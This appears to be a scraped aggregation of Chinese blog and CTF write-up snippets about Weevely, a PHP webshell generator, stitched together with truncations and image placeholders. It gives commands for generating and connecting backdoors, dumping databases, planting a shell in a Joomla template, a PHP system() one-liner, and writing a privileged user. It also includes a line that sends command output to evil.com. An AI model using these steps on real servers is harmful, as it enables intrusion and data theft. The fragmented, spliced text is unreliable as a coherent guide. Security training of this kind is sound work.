Weevely是一款python编写的webshell管理工具,作为编写语言使用python的一款工具,它最大的优点就在于跨平台,可以算作是linux下的一款菜刀替代工具(限于php),总的来说还是非常不错的一款工具...基本用法 root@kali:~# weevely [+] weevely 3.2.0 [!]...Error: too few arguments [+] Run terminal to the target weevely [cmd] [+] Load...session file weevely session [cmd] [+] Generate backdoor agent weevely generate <password...项目地址: "https://github.com/epinna/Weevely" ?
Weevely类似于菜刀,一个厚客户端,与一个轻服务端,由客户端生成要执行的代码,传递到服务端执行。与菜刀不同的是Weevely只提供命令行终端,同时自己生成服务端文件。...> Weevely将服务端代码分散放入单字符的变量中,同时夹杂着大量无用字符(@. ,随机字符)以绕过一些关键词的匹配。...> 代码传递 不同于菜刀,Weevely单次的命令会发送多个HTTP请求,将要执行的代码进行分散传递。下面将结合Weevely Agent源码与数据包报文进行代码传递分析。...针对Weevely默认代码,可对HTTP Accept-Language字段进行检测,识别Weevely连接。但很容易通过修改源码进行绕过,将控制数组放置到其他HTTP字段中。...Github:https://github.com/epinna/weevely3
Weevely是一个专门为web渗透攻击设计的web shell,由于是用python语言编写的工具,因此支持跨平台可以 任何有python环境的系统上使用。...安装更新 在kali中已经默认安装了weevely 其他类似系统安装执行下面命令即可。...apt-get install weevely -y 基础用法 生成web shell 格式如下: weevely generate 示例: weevely generate...格式如下: weevely [cmd] 示例: weevely http://192.168.1.2/88.php 8888 image.png 查看系统信息 所需命令...image.png 对数据库进行脱裤 所需命令:sql_dump sql_dump -dbms mysql tianyuan root 12345678 image.png 文件操作 当获取到目标系统的weevely
上传漏洞 首先,标题是upload, 提示就是上传漏洞 无非就是js拦截,代码拦截,看了以下 网页head头,发现js代码,关键字jpg burpsuite 抓包,配置代理 weevely 生成一句话...weevely generate password ./1.php #use weevely在当前目录生成1.php,密码passwd mv 1.php 1.php.jpg 选择文件上传 && burpsuite...抓包 删掉.jpg 回显 upload success : upload/1592555994.1.php weevely 连接 weevely http://220.249.52.133:57535.../upload/1592554838.1.php password # weevely 连接 dir # 显示目录 cd ../..
利用weevely生成webshell,待使用。 ? 在Joomla后台的模板管理中,选择一个模板并编辑,增加一个名为webshell的php页面。 ?...将之前利用weevely生成的webshell粘贴进去,并保存。 ? weevely连接成功,获得shell。 ? 查看内核版本。 ?...用weevely shell生成一个meterpreter shell。 ? ?
这里就是想介绍一下自己使用的一个特别好的工具,就是 weevely。这个工具是 kali 中类似于中国菜刀的工具,功能强大。这里主要介绍一下简单的使用以及我是用的时候一个小小的坑。...下面就是 weevely 的使用了。 首先在 kali 中搜索这个工具打开,先生成木马:( weevely generate) ?...下面就可以通过 weevely 拿到后门了。上传之后,首先访问一下文件路径。然后通过命令: weevely 就可以连接远程机器了: ?...后来才知道 weevely 无法保存数据库的状态,所以无法使用 usedatbasename 这样的语句。其实使用 select*fromctf.flag 就可以拿到 flag 了啊。
/hm scan 网站根目录 六、Weevely(生成php后门工具) 下载地址: https://github.com/epinna/Weevely3 $ git clone https://github.com.../epinna/weevely3.git $ cd weevely3 #生成一个后门木马hello.php,密码为test $ ..../weevely.py generate test hello.php #连接后门 $ ..../weevely.py http://url地址/hello.php test 连接后操作命令 #查看系统信息 $ system.info #获取数据库连接信息 $ grep . '^[^*/#]*
weevely 是kali中的php webshell 工具。但相较于 webacoo ,weevely 的功能更加强大,同时对于webshell的连接设立了密码选项!...下面我们来实例演示, weevely 的具体使用。...准备环境: kali linux Metasploitables2 首先还是先制作一个 webshell ,密码为 bbskali weevely generate bbskali secist.php...我们使用 cat 命令简单查看下 webshell 的内容: cat /usr/share/weevely/secist.php 现在我将生成的 webshell 远程拷贝到目标机器上: scp /usr.../share/weevely/secist.php msfadmin@192.168.30.128:/home/msfadmin 或者上传PHP木马 连接一句话木马 weevely http://192.168.30.128
//evil.com/$(id|base64|tr -d "\n"); 所以只剩下上传shell,唯一的障碍是对当前目录没有写权限,所以上传shell到uploads/ (生成shell,我用的是weevely...工具) https://github.com/epinna/weevely3 如果按步骤描述这个过程: 1.将 shell 保存在本地 txt 中,以便能够通过 curl 传输它,并在自己的主机上启动服务器用... ngrok 建立隧道 2.发送一个payload,将我们的 shell 保存在uploads/shell.php 3.使用weevely连接到上传的 shell 经过几天的帮助解决问题后,该公司奖励了我一笔赏金
7、Weevely Weevely是一种Python编写的webshell管理工具,跨平台,只支持PHP。...github项目地址: https://github.com/epinna/weevely3 用法示例: weevely generate weevely ...同时,在Kali 2.0 版本下,集成了三款Web后门工具:WebaCoo、weevely、PHP Meterpreter。
Weevely 在kali linux中,我们用的比较多的就是这款php后门管理工具 weevely了。 Weevely支持的功能很强大,使用http头进行指令传输。唯一的缺陷就是只支持php。 ?...我们通过帮助可以看到,weevely的使用还是很简单的,首先我们在/root目录下生成一个名为weevely.php密码为123的backdoor agent。...weevely generate 123 /root/weevely.php 然后我们只要上传到目标服务器之后运行 weevely 就能成功连接上了 ?
weevely weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身,仅用于安全学习教学之用,禁止非法用途),可以算作是linux下的一款菜刀替代工具(限于...使用weevely生成的shell免杀能力很强,并使用加密连接,往往能轻松突破防火墙拦截。...#从提示中可以看到 连接一句话木马: weevely [cmd] 加载session文件 weevely session [cmd] 生成后门代理...#通过weevely生成一句话木马 weevely generate test /root/Desktop/test.php (#test为密码,/root/Desktop/test.php输出路径...通过weevely连接一句话木马,可直接执行CMD weevely http://www.xxx.cn/test.php test ?
这里需要用到kali上的一个工具weevely, 参考链接http://www.freebuf.com/sectool/39765.html 如下命令 weevely generate shell/root...shell.php 然后访问 http://192.168.43.132/uploaded_files/shell.php 没有任何提示,说明此是shell.php已经成功上传,并且我也进行了访问 使用weevely...进行连接 weevely http://192.168.43.132/uploaded_files/shell.php shell ?
五、PHP后门生成工具weevely weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似...telnet的方式来代替web 页面式的管理,weevely生成的服务器端php代码是经过了base64编码的,所以可以骗过主流的杀毒软件和IDS,上传服务器端代码后通常可以通过weevely直接运行。...weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术,后门中所使用的函数均是常用的字符串处理函数,被作为检查规则的eval,system等函数都不会直接出现在代码中
3.weevely:可替代菜刀的工具 项目地址:https://github.com/epinna/weevely3 后门生成的参数: :generate.php(生成php后门文件) :generate.img...该后门需要服务器开启.htaccess) :generate.htaccess(将后门代码插入到.htaccess,同样需要开启.htaccess支持) -generate/generate.php -weevely
我们用weevely制作一个php小马上传到服务器上. 1.weevely使用选项 root@bt:/pentest/backdoors/web/weevely#./main.py - ?...2.用weevely创建一个密码为koko的php后门 root@bt:/pentest/backdoors/web/weevely#....接下来上传到服务器之后来使用它 root@bt:/pentest/backdoors/web/weevely#.
后门 weevely是一款用Python语言编写的针对PHP平台的WebShell,主要功能有: 执行命令和浏览远程文件 检测常见的服务器配置问题 创建TCP shell和Reverse Shell 扫描端口...安装HTTP代理 1.基本用法 2.常见命令 weevely [cmd]:连接一句话木马 weevely session [cmd]:加载会话文件 weevely generate :生成后门代理...1.weevely generate test /root/桌面/test.php 1.实验 2.访问一下。...3.使用weevely命令进行连接。...weevely http://192.168.1.2/test/test.php test 补充: 一些常用命令及功能: • audit_phpconf:审计PHP配置文件 • audit_suidsgid
php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); } 0x05 权限提升 weevely 使用weevely...生成小马 weevely generate hello ....weevely连接马儿 weevely http://192.168.56.130/drupal/door.php hello ? 浏览用户目录 ?...使用weevely自带的file_download命令下载passwd文件到本地 file_download passwd /root/Vulhub/os-hackNos/passwd 写入特权用户 echo
生成PHP版的webshell 在kali中执行下面命令: weevely generate 123456 /root/hacker.php 即,在root目录下生成了一个hacker.php的webshell...image.png 用kali连接webshell weevely http://192.168.232.204/upload/hacker.php 123456 image.png 如上如图,成功获得服务器的权限
文件名的问题解决了,接下来看一下怎么骗过文件检测,php不熟,求助于baidu,得知这种检测只看文件头是否含有特定关键字,这就好办了,接下来用weevely生成webshell ?...修改之前的脚本猜测新的文件名,然后weevely获取shell。 新版本的weevely shell可以升级成为meterpreter shell,命令不在本文中介绍 ? ?
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
即时通信 IM
实时音视频
